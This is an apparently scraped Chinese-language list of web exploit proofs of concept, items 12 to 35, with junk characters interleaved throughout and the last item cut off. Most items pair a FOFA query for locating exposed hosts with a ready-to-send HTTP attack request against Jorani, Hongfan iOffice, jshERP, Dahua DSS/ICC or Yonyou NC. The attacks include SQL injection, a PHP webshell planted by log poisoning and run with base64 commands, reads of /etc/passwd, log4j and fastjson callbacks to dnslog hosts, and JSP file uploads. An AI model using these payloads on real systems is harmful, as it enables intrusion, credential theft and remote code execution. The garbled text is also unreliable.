' j( e/ Q# ~* ^GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1# X0 c+ K# }* }0 ~- i7 c
Host: 127.0.0.1
1 s p i3 `6 _& D+ }. K( XPragma: no-cache
" M3 ~4 }" r. g7 r2 X3 M3 yCache-Control: no-cache: e- t0 [7 s: |& G3 B ?9 p
Upgrade-Insecure-Requests: 1- `4 g* ~, l9 \) D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
( l0 L& K9 ]1 s3 s* a# V' l/ |' [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* @5 K' u, T2 I/ d! XAccept-Encoding: gzip, deflate* n6 v9 b* N. g
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8+ s3 [& \7 o( v$ E# T, [
Connection: close% ~/ E2 `: a$ H$ C" o/ S
, H% ~+ s( _ A2 ?; K* v/ o
! R/ o$ f! q7 r- u' c* X6 U12. Jorani < 1.0.2 远程命令执行7 m- z; G/ ]6 L, M
FOFA:title="Jorani"
; E! t" l( ?1 |. B0 |第一步先拿到cookie3 e' V8 l' \6 N: ?. o
GET /session/login HTTP/1.13 v) N6 c/ Y0 i1 T; ~2 _( {: h
Host: 192.168.190.30
) ^! e7 X6 M) U: B6 [2 Y# OUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.366 u4 U& ~' o5 e: z# j7 ^5 j
Connection: close5 F+ C7 M1 Z0 @* X9 S7 u0 d
Accept-Encoding: gzip A% m4 P& o3 O! K. \
0 P& x7 Y' S+ l1 J/ w/ M
: K$ [+ u* S4 [, b. s7 ]0 s响应中csrf_cookie_jorani用于后续请求
* B; Z0 B8 K, y" }HTTP/1.1 200 OK, k* v2 ^2 q" c. j
Connection: close7 C ^1 \3 @. m+ |7 f4 w, Y
Cache-Control: no-store, no-cache, must-revalidate
# H+ E `/ f- U0 e- b1 PContent-Type: text/html; charset=UTF-85 N% ?( V$ W( E- f f4 ^
Date: Tue, 24 Oct 2023 09:34:28 GMT6 g6 P; v; s# a4 k) Y8 F
Expires: Thu, 19 Nov 1981 08:52:00 GMT
, X" g V. q3 V* p F% J3 @% b6 i8 ZLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
) ?- \9 Z) _! o+ HPragma: no-cache7 q* P: o/ [( W+ n) }# P
Server: Apache/2.4.54 (Debian)
5 S, ~: J' |- \Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/, N( l- g- x8 Y
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
' a( {1 T! i, a: yVary: Accept-Encoding
5 ^$ ^% Q/ a8 h/ Y3 F5 g
f7 G# Y% ~, z0 x& N! M8 i0 m3 t; h0 ~2 U* j. t& u
POST请求,执行函数并进行base64编码( f) l% L* |- f: V
POST /session/login HTTP/1.1
0 t+ m% B4 m8 k p* q8 e9 YHost: 192.168.190.30
# R% K1 S- \2 T3 T- z# JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.364 j' U; u. h8 Q
Connection: close8 y; Y3 d% y5 P! ?7 g& {; j# o
Content-Length: 252
) L/ [( I" T% B1 [* O2 lContent-Type: application/x-www-form-urlencoded- u! I4 o8 K; w* v: \
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r- H( C3 F9 G; R6 J6 p& |
Accept-Encoding: gzip/ x( H: Q% A& K6 o9 j$ o" U
, n# J, z' c6 m! t+ X
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor9 r3 i( w* G" T; V
( I6 X! e; t/ H x
: f! {/ {& A$ |6 d
8 q! U2 [8 s3 z% T* h) Z) G$ q
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
4 t! I# u0 d) B* g' E" zGET /pages/view/log-2023-10-24 HTTP/1.1+ T+ _) m' C! |9 s, @. f* u
Host: 192.168.190.30% \% B) ?' }% G# D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 y- P5 k* K! N0 Z' CConnection: close
( L" ?: Y$ s. Y0 oCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
. @- L7 y6 r3 g8 B$ I* K5 FK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=- N6 w# @. `! ?2 H% v* t" G
X-REQUESTED-WITH: XMLHttpRequest0 R& y- ]5 O8 P6 b
Accept-Encoding: gzip# B& \5 r6 G- n4 `
0 D% x, r" ^( ~2 M; U
0 {+ ^- E# N& d$ W: p13. 红帆iOffice ioFileDown任意文件读取
0 v7 P7 y# ^! u$ W8 ZFOFA:app="红帆-ioffice"0 v% X/ Z/ G8 i! B3 x5 \
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1& [* G1 l; u% D6 t0 b( s5 j7 d
Host: x.x.x.x
b- d5 d- W, Y/ gUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.367 O4 a: z3 I% q+ L6 ^
Connection: close7 ~1 Q5 X& @! S) Q2 ^
Accept: */*# T! t. @, @5 S4 W" y, q! V% l
Accept-Encoding: gzip
8 [. J. f( Q2 `# r- i7 m5 o/ W! w+ \7 D
) J2 w; M1 F8 x: e" z% \
14. 华夏ERP(jshERP)敏感信息泄露 h) C; |2 b4 {, l1 K; ]
FOFA:body="jshERP-boot"
z l- E9 C4 k* I泄露内容包括用户名密码" F$ e$ x4 l4 R2 }
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1+ P6 A( ?2 G5 _* I% p5 V
Host: x.x.x.x% S# j/ u, P$ B, G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.368 v- B( ?/ l( D, E) I4 p0 ~
Connection: close0 D& S* a1 L) t3 {. |
Accept: */*# u$ c, [$ v# o/ N" R
Accept-Language: en
5 B E+ x5 `$ F+ ^Accept-Encoding: gzip
; b/ I. \5 q' n* h. Q! K( |$ s ?+ | N
" v2 a! Q: r& B/ ~5 [4 j15. 华夏ERP getAllList信息泄露/ \' I, `7 N7 T5 ~
CVE-2024-0490
v3 C3 c/ C) a/ l6 UFOFA:body="jshERP-boot"
4 ]& o: H& P8 p( Y. ^9 e! x7 i3 y泄露内容包括用户名密码- X0 P% T) b( n: @
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1% Z2 P- S/ t- ~( j* t
Host: 192.168.40.130:100; j9 B2 t5 d. G& { \7 u4 s# |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
- k! ]- r! _0 m* n( wConnection: close/ Q t( a6 O/ t r
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
) ]" p: B( ?, W% h4 x7 J G7 AAccept-Language: en* Z; g! K- m* p( X
sec-ch-ua-platform: Windows0 k A) w' y4 W* t! T
Accept-Encoding: gzip
1 H9 o( o# ?' b9 q H$ A6 W0 C+ g3 s% @, t& Y& @- [9 V
6 L0 {) `6 N+ t1 g# q6 C16. 红帆HFOffice医微云SQL注入
1 E9 P# \& Q% L& ~' [/ N) uFOFA:title="HFOffice"
: v+ K; F* h) f9 ~6 H0 R2 a2 p* L0 jpoc中调用函数计算1234的md5值9 H2 @. G# |& C1 n) [
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
7 y& t0 M' z; H0 x/ s2 v$ T& WHost: x.x.x.x
$ h* J/ n9 e9 [User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36/ m* E, a0 R5 _0 k
Connection: close
5 b5 c, Q0 q9 {3 ?0 G. [( dAccept: */*( {4 [6 i5 o7 q. x
Accept-Language: en+ n1 P4 M3 m2 D
Accept-Encoding: gzip4 W, L3 i/ Q' Q: i, p
- t3 z# ]; `3 N8 E+ H
( @, v* h8 c5 F# O; R5 l
17. 大华 DSS itcBulletin SQL 注入
1 C0 P. G1 P, a! [1 R6 W8 P' nFOFA:app="dahua-DSS"# R: B: V6 x- k7 L
POST /portal/services/itcBulletin?wsdl HTTP/1.17 r* k! r2 ~& E. H* Z8 p
Host: x.x.x.x- N& w3 u3 _. H& O4 h* [: Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 \5 |8 p, w+ i, T m; O/ s6 i
Connection: close
/ o2 p( E8 e2 b, g: C, e* W2 _" |Content-Length: 3458 x3 j! ^! @6 R, E, i+ b" e; c/ f
Accept-Encoding: gzip h7 c; f) g! z( o) q, D$ x6 q
3 ]0 E' x$ {) f* a& i( x- K: X9 {
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
2 K+ v2 ^+ t7 S, E<s11:Body>7 H, X2 |7 ^( L, k: D) ]" j7 z
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
3 f s0 q$ G4 w9 y <netMarkings>
( @; p: s$ f+ K+ V6 J& ?* p3 w9 Y (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
5 g+ @4 p' d; @ ? </netMarkings>& F5 P8 F$ u7 K- X& a
</ns1:deleteBulletin>
; c+ Y6 v/ P& n U) { </s11:Body>
- I: G c H& H' y0 t' h2 y/ U1 \</s11:Envelope>* J8 \3 G6 ~9 y
1 H; q7 U+ M; h3 C+ T, G3 {' `* U
, ?7 H5 {. ~/ k* U% u/ E18. 大华 DSS 数字监控系统 user_edit.action 信息泄露1 c. S8 q# K% c/ L6 j9 h
FOFA:app="dahua-DSS"
$ J& r( h5 r. ~6 O$ U; d! ?GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1) m' z. S2 T/ ]% l
Host: your-ip
$ P) r6 e3 S" J9 W( LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 J0 Q1 P3 v# G7 t
Accept-Encoding: gzip, deflate! T" n* a! [5 v, _$ G
Accept: */*4 {# M2 V8 n1 q4 d. P' t( Q
Connection: keep-alive
/ K S6 K( W; f( y9 K% ~
2 x9 f2 e2 U6 l s. O* C: J- Q
) e& z0 {! x% R; l+ U! Y! ^3 F# @' n q/ F2 G* ^6 H
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入% T- e/ e$ t a5 x
FOFA:app="dahua-DSS"
6 p. P& d- a4 j: n& A p/ S7 ?% @GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1/ k* A7 J( V: u! Q# N2 }
Host:+ E4 [! _: v2 B
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
" m0 v( g+ M! s7 [" }# }! zAccept-Encoding: gzip, deflate
B% p1 n% n! {+ c) i9 F# d& `9 CAccept: */*
5 A" h( S% ]) a4 p7 [( P( r8 mConnection: keep-alive9 s0 Q" \: z) a6 P& w# Z6 {
" H) X4 o$ _+ {+ b
% p" a# x( {, s: V' k" @, f20. 大华ICC智能物联综合管理平台任意文件读取
6 I1 ^, R. P6 c$ }& \0 ^+ KFOFA:body="*客户端会小于800*"7 G" a8 Q x, i. z0 ~
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
$ D8 Z; t4 Q/ u- z7 z0 Q4 b% CHost: x.x.x.x
* E9 T6 a3 X z7 Y) p& ^* kUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36, N8 n4 P; \/ m# o4 H
Connection: close
7 C; R+ v/ ]: A1 d$ O+ ` u BAccept: */*
* i1 ]; E/ Z' v( VAccept-Language: en
' P6 w6 l) m; D/ {Accept-Encoding: gzip
4 G) T; C6 P" v+ I% k( G
0 Z# s I I) \( Q* `) q5 f9 P0 U6 m6 l( I* X8 s6 S9 Q
21. 大华ICC智能物联综合管理平台random远程代码执行
' B7 @# F% T/ ~9 j$ fFOFA:icon_hash="-1935899595"/ x6 o3 r# j- L, u( u7 I$ o! s
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.11 n+ ?! w* Z2 B
Host: x.x.x.x
) h' k* y* d% `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ `4 ?& x- ^. Y9 nContent-Length: 161
3 A6 K* A- L r: o. V% s/ rAccept-Encoding: gzip
+ N3 p! ^3 V, |& P! C+ MConnection: close* O `( t5 ?. d( k' }* Y' {6 h
Content-Type: application/json;charset=utf-8( z8 {) s1 B) E T1 e: x
8 @6 |! r/ @& s/ J# }8 ^{
8 _+ U; L; z( n' o"a":{
- E) X" n }7 | n, H2 S0 \: B "@type":"com.alibaba.fastjson.JSONObject",$ P% _8 G! U. y0 j1 H, q
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
7 |& \' l6 d; R& j3 b }"", D6 U8 ^% Q) E2 c) O% ?
}, b. ?- H y' T7 e" z
# i2 {4 ] L V2 f
* K, h4 _5 [! q$ |# A2 e22. 大华ICC智能物联综合管理平台 log4j远程代码执行
" f$ j2 D2 _* \- {FOFA:icon_hash="-1935899595"
! n+ w; A5 p/ qPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1( O* E& s! i# q2 g" {+ [- ~
Host: your-ip
: j0 f* |8 j6 I* e. {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
/ _% T5 N) a' }/ G; \Content-Type: application/json;charset=utf-8
" G; ]" E/ k% r0 {7 n. p. E- x. F" I* X/ K. [/ O/ |, F
{7 ^' E F' J$ p7 M( H( c
"loginName":"${jndi:ldap://dnslog}"
6 O3 H0 O1 ?: ?* M- |' Y# j}
# J/ H5 J+ R' c7 s! E+ d* {1 L
% L, b) u2 ?! G9 z2 m4 F3 _5 B
: q3 l0 @- h" Y& X) R2 O4 { p, z
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行0 X! g7 D% E1 S. m& h" C: ?' L
FOFA:icon_hash="-1935899595"4 S- L7 K! L& z9 \4 o+ S/ G
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
* a8 ^, i7 S* r. P& r3 GHost: your-ip
* s, C* b; W1 @5 w' W6 P% SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 O. M2 b+ M7 y; m. sContent-Type: application/json;charset=utf-8
9 \% H2 Y; G# p y* q/ gAccept-Encoding: gzip, D" ^+ S3 P/ H3 t" e6 W
Connection: close
! ]6 i" O8 H) r4 U
, \/ P) k) m4 \2 g; p# _{
f& @( r' E' R- \4 x "a":{
+ \3 y* E" h" S3 N* u "@type":"com.alibaba.fastjson.JSONObject",+ \% C" L, {$ u9 i% t/ g
{"@type":"java.net.URL","val":"http://DNSLOG"}1 R, c/ C" p5 W( n* _ |
}""
' V6 o1 C/ L+ L}
- S d# n4 w5 g- i3 g$ W" O- H! C+ y& C' B4 g* q
; f# F% n# f U9 x$ K$ k24. 用友NC 6.5 accept.jsp任意文件上传
2 J3 C+ z. q) K* |8 p+ [FOFA:icon_hash="1085941792"
: X. i: M1 j! O' J0 ^& bPOST /aim/equipmap/accept.jsp HTTP/1.12 `' _7 L- d$ X5 D2 P% x @
Host: x.x.x.x
( U( Z9 @; {$ _1 d8 K; N& XUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
( C9 ?! W$ k* T, V, u R6 x( j4 a2 tConnection: close D. Y( b: B4 V& K( l# D
Content-Length: 449/ Q; P$ F: \ ^; z* ^
Accept: */*
. ^4 B9 R; }$ h* f. YAccept-Encoding: gzip/ g# B7 w# b" ]; Q0 m* X8 w
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Q- o: E" V7 \ I. J$ E
: J1 q8 I: t, v. U" p-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
& _0 g* e' Y4 X# ?; ]! U2 N2 N8 nContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
+ a" A% o Z6 ?) U) d5 ]7 KContent-Type: text/plain
5 a# u% ^6 X3 Q# ^+ c0 u) S. M+ p( X7 c% {: t; A. u9 G- u+ l" l
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>) K- o& v% b! H
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc& R* d- p/ J# c" M
Content-Disposition: form-data; name="fname"! [, E, W3 s! {
! b2 I+ n5 a. V) e& m) B! z9 Q1 U, V\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp$ h: B$ v n0 @# u e
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
' D/ k/ \5 {! ^- e1 n( A3 [* H) U, p/ V2 H6 V/ O
3 I: ]! ], X7 J& G" j( |# t- M: _; f25. 用友NC registerServlet JNDI 远程代码执行1 s# z, m- D7 M" d4 B& ]
FOFA:app="用友-UFIDA-NC"2 f& z: E1 w5 X( r& u. k- h
POST /portal/registerServlet HTTP/1.1
- Y# e9 v: z4 [+ j7 U. h" BHost: your-ip2 J' T A$ z/ B' d9 n$ f5 J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0+ w' N* w4 C& g; D. q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9' v" h8 d# c; { K. w) D: t/ M
Accept-Encoding: gzip, deflate$ @9 l4 ~" M+ B& L4 Y
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6) j! T$ ]5 Q7 R1 X% l" B8 v
Content-Type: application/x-www-form-urlencoded0 F( `; O. n1 q- q
- U' M6 z. T' O% jtype=1&dsname=ldap://dnslog L4 ^* U. ~/ C& A6 {$ N
8 ^0 I: S6 U7 a/ ?9 `$ c1 ~+ ~& [. P+ D2 j1 [% s9 G5 }& a" z' Z
1 b9 C( ]2 W; p- a) T3 v; U, g26. 用友NC linkVoucher SQL注入
0 r& D- ` u7 n! ~0 a% w& [! [# VFOFA:app="用友-UFIDA-NC"
6 J; _$ B5 P- p: r/ W: MGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
; p( J$ j+ Y& @' fHost: your-ip
) ~( i9 |8 i# g+ x1 RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ [1 K4 B' S! _) }2 X
Content-Type: application/x-www-form-urlencoded
2 R& T7 t( ~; iAccept-Encoding: gzip, deflate
) S Y' z6 B8 A; C0 Q" B2 P8 g8 MAccept: */*( I7 R" H* D9 W+ h0 \
Connection: keep-alive! e' x4 y j% w6 I6 T
7 E$ Q i; I: h! t; b7 J7 t( t
% u* ~3 u* r( [
27. 用友 NC showcontent SQL注入
. x* u( e& V, F' ?% c! nFOFA:icon_hash="1085941792"0 K! V1 K" b# R4 l- s
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
- {8 w( ~2 U( V+ t% o' k; j6 vHost: your-ip1 B* y E0 S$ r/ E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, }- ~, O: q/ L4 l" q8 Q
Accept-Encoding: identity
9 T5 O6 I6 Y" ?0 n! XConnection: close6 ]( m5 H3 _& F3 l
Content-Type: text/xml; charset=utf-8
# C6 Z9 B) x/ f) x$ J9 S2 x! ?! a' G" R6 G2 q$ s" n
( |) c) S) Z' f+ Q: F% N! W
28. 用友NC grouptemplet 任意文件上传
) l- f) o1 `/ c9 jFOFA:icon_hash="1085941792"0 A+ i; F# \3 ?6 N- T/ O- ^! c1 w
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1) ?9 U: n. K. P5 S
Host: x.x.x.x1 w* f+ s' |/ h4 m2 _; ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36) O/ k& X) e4 J# a0 N$ E2 k8 `: J
Connection: close B' G+ X/ V" g' G
Content-Length: 268 d3 s4 w3 i: c# }& c# u. ~5 H. B: Z& W
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk& B2 O# t- ~5 J7 F9 L' a; m
Accept-Encoding: gzip( m) @0 h) `/ T( Q
& g, m$ u( Y( S+ K6 j3 A, v6 T------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk, a0 M) q; _' g8 H# v
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp": w+ c) r" c! \+ x' ]
Content-Type: application/octet-stream) J* h z% M' j2 M
8 l! p' n) ], g4 G7 a
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
. ]4 t6 D' D1 g; z! D------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
) J* ~; ]" H! p. @9 [* F0 _- Y- @( L& n) n9 Q! ^
% c' L3 V# v9 I( f5 N! H. ]
/uapim/static/pages/nc/head.jsp0 ]4 |& O" X" {) G
7 [$ S, d8 u7 ~29. 用友NC down/bill SQL注入7 ?$ I1 Q3 r) O0 L3 l8 Z s
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif" R# J$ E. W% _- ~2 J
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
9 L6 {6 r' S8 d( l2 P% QHost: your-ip* d+ k: D: W( y: I: A# a3 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% i e) H# Y; p, hContent-Type: application/x-www-form-urlencoded
* V. Y1 a0 B1 f9 @( z2 \Accept-Encoding: gzip, deflate
# ]0 Q L; w$ }" j. [Accept: */*
! B" _3 H# D( C& M# {* Z/ NConnection: keep-alive7 U* p/ \/ l' C, r9 a/ _
' ~/ F3 N4 b1 Z, ^1 W$ W
8 L4 `: D. }6 ]& ]; M: x$ k30. 用友NC importPml SQL注入
! H) _* x) A( w EFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
- ?7 A9 J6 x, p% d8 H+ F7 rPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.16 ?2 ^1 Z* S- j' Z3 |
Host: your-ip
5 o( f/ y! n8 {& f- LContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
/ H$ g; u% x; @# ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36, Y8 O! @; s% z1 p% q
Connection: close
1 h$ i# f3 W/ a; g0 f) ]6 N. E6 g2 O/ J: W
------WebKitFormBoundaryH970hbttBhoCyj9V& s6 D+ Z, j: I" \3 q0 T
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
" i& u9 n: B2 p+ |7 NContent-Type: image/jpeg
7 \. h& j# W2 ~7 b3 B3 j------WebKitFormBoundaryH970hbttBhoCyj9V--
3 u5 G4 x, X9 g' r+ R( ^ N
" }1 x! L+ z: C+ h# l/ ^( ]5 s+ @& ]
31. 用友NC runStateServlet SQL注入
* j5 ]4 k) L: c. h; E3 b6 h! ^version<=6.51 X9 [( V8 E* Q4 _) ^" s
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
. K( e! n3 y) `GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1+ R& Z5 `( I* ]5 ~3 H1 S
Host: host
* x2 ]" W8 U2 F/ cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
3 T1 E* i9 r! ~* ^% ]0 L! `( W2 Z4 CContent-Type: application/x-www-form-urlencoded# t. b. p: r0 y& S
6 l! ?& w0 w3 j( k; B. r# O2 s) D
$ e4 b+ @+ j9 }9 H0 a- {5 P32. 用友NC complainbilldetail SQL注入8 b% `) `) L& ~, W/ u( l. |' p$ |
version= NC633、NC652 |1 e/ {5 ]+ f$ y" c( [+ U
FOFA:app="用友-UFIDA-NC"
, L- [% C H" q8 CGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
) L, \7 w2 U5 j# |Host: your-ip+ ~# F- b! \# {% F3 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ w. m8 r6 ]- _) HContent-Type: application/x-www-form-urlencoded7 |- k' V$ ]- [2 u( h
Accept-Encoding: gzip, deflate
# R+ O s7 A, a, l* W5 \8 qAccept: */*
4 m8 |# g, d: k2 r. y5 qConnection: keep-alive
) F5 I; |& } r8 ]: e$ o
* E( Q3 A7 w1 k1 C# b, j) l% d4 g. N
, _1 j7 o5 |8 O$ J33. 用友NC downTax/download SQL注入
. n( l0 P; p) C- o) aversion:NC6.5FOFA:app="用友-UFIDA-NC"( W# }" _: |6 o6 {! R+ }
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 j, |( x, X& d5 ?( P( u& sHost: your-ip+ s: _8 b8 V: w7 }/ B4 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 p8 V" [' A& e6 F6 W( A1 Q- j
Content-Type: application/x-www-form-urlencoded
3 R; n- _' [- \# {' `8 uAccept-Encoding: gzip, deflate
: P- ]4 j0 ^9 c' GAccept: */*$ c# M( \" x2 [3 c6 {
Connection: keep-alive$ f) w# t% ^! v1 p1 `# P
6 C+ Z/ I, B; G9 V4 x% V
( v. ^" X: u6 o/ _2 s34. 用友NC warningDetailInfo接口SQL注入
& T+ O# [! P; ?3 J( c% kFOFA:app="用友-UFIDA-NC"
" V1 a8 r( J2 x4 PGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.18 C) h0 o7 K* L6 I/ \3 z
Host: your-ip
8 N. I, Z4 f, K; n2 R E# v P; n5 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( v, X6 _" p+ {' T( PContent-Type: application/x-www-form-urlencoded
" s4 T4 t; C& o" `1 mAccept-Encoding: gzip, deflate) z6 ~4 h. t5 ?2 S+ F; Z
Accept: */*, @0 K p% N1 b7 e
Connection: keep-alive8 M) w& L+ a x
* x1 A3 ~" O! A8 L. c# ]
7 K6 b$ }# L u# J, \( y
35. 用友NC-Cloud importhttpscer任意文件上传
% c0 ]) R' [0 M. F! [FOFA:app="用友-NC-Cloud") C/ G: g# i9 X! G, H3 F* ~
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
